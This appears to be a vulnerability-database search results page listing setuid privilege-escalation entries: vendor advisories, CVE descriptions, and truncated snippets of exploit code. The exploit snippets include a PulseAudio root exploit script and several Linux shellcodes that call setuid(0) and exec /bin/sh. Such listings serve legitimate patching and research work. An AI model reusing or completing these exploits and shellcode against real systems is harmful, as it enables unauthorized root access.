3209 matches found
PulseAudio setuid Local Privilege Escalation Exploit
No description provided by source. !/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c EOF include stdio.h...
PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)
No description provided by source. PulseAudio setuid Local Privilege Escalation Vulnerability http://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- Put files in /tmp/pulseaudio-exp or change config.h. Must be on same fs as the...
Pulse Audio setuid Privilege Escalation
!/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include include include include include define...
GLSA-200907-13 : PulseAudio: Local privilege escalation
The remote host is affected by the vulnerability described in GLSA-200907-13 PulseAudio: Local privilege escalation Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself...
Null pointer dereference
The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PERCLEARONSETID setting that does not clear the ADDRCOMPATLAYOUT and MMAPPAGEZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to 1 conduct NULL...
CVE-2009-1895
The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PERCLEARONSETID setting that does not clear the ADDRCOMPATLAYOUT and MMAPPAGEZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to 1 conduct NULL...
xscreensaver 5.01 - Arbitrary File Disclosure Symlink
xscreensaver 5.01 - Arbitrary File Disclosure Symlink xscreensaver local arbitrary file disclosure | symlink attack The �xscreensaver� program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on...
xscreensaver 5.01 - Arbitrary File Disclosure Symlink
xscreensaver local arbitrary file disclosure | symlink attack The �xscreensaver� program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on by default Example: Opensolaris The xscreensaver...
xscreensaver Symlink Attack
xscreensaver local arbitrary file disclosure | symlink attack The ´xscreensaver´ program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on by default Example: Opensolaris The xscreensaver program...
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
Linux/x86 - setuid0 + execve/bin/sh Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov...
Linux/x86 - Disable Shadowing Shellcode (42 bytes)
Linux/x86 - Disable Shadowing Shellcode 42 bytes. Shellcode exploit for Linuxx86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push and pop! "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov...
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)
Linux/x86 - setuid0 + setgid0 + execve/bin/sh,/bin/sh,NULL Shellcode 25 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80...
Linux/x86 - setuid(0) + execve(/bin/sh,0) Shellcode (25 bytes)
Linux/x86 - setuid0 + execve/bin/sh,0 Shellcode 25 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do...
AIX 6.1 TL 1 : bos.rte.cron (U825668)
The remote host is missing AIX PTF U825668, which is related to the security of the package bos.rte.cron. The at command does not drop permissions when reading certain files. A local attacker may exploit this error to read any file on the system because the command is setuid root. The following...
AIX 6.1 TL 2 : bos.rte.cron (U825550)
The remote host is missing AIX PTF U825550, which is related to the security of the package bos.rte.cron. The at command does not drop permissions when reading certain files. A local attacker may exploit this error to read any file on the system because the command is setuid root. The following...
kernel: exit_notify: kill the wrong capable(CAP_KILL) check
The exitnotify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAPKILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exitsignal field and then uses an exec system...
Important: Red Hat Security Advisory: kernel security and bug fix update
Updated kernel packages that fix two security issues and two bugs are now available for Red Hat Enterprise Linux 4.7 Extended Update Support. This update has been rated as having important security impact by the Red Hat Security Response Team. The kernel packages contain the Linux kernel, the cor...
kernel: exit_notify: kill the wrong capable(CAP_KILL) check
The exitnotify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAPKILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exitsignal field and then uses an exec system...
Important: Red Hat Security Advisory: Red Hat Enterprise Linux 4.8 kernel security and bug fix update
Updated kernel packages are now available as part of the ongoing support and maintenance of Red Hat Enterprise Linux version 4. This is the eighth regular update. These updated packages fix two security issues, hundreds of bugs, and add numerous enhancements. Space precludes a detailed descriptio...
linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
No description provided by source. / setuid0 + execve/bin/sh - just 4 fun. xi4oyu at 80sec.com main asm "xorq %rdi,%rdi\n\t" "mov $0x69,%al\n\t" "syscall \n\t" "xorq %rdx, %rdx \n\t" "movq $0x68732f6e69622fff,%rbx; \n\t" "shr $0x8, %rbx; \n\t" "push %rbx; \n\t" "movq %rsp,%rdi; \n\t" "xorq...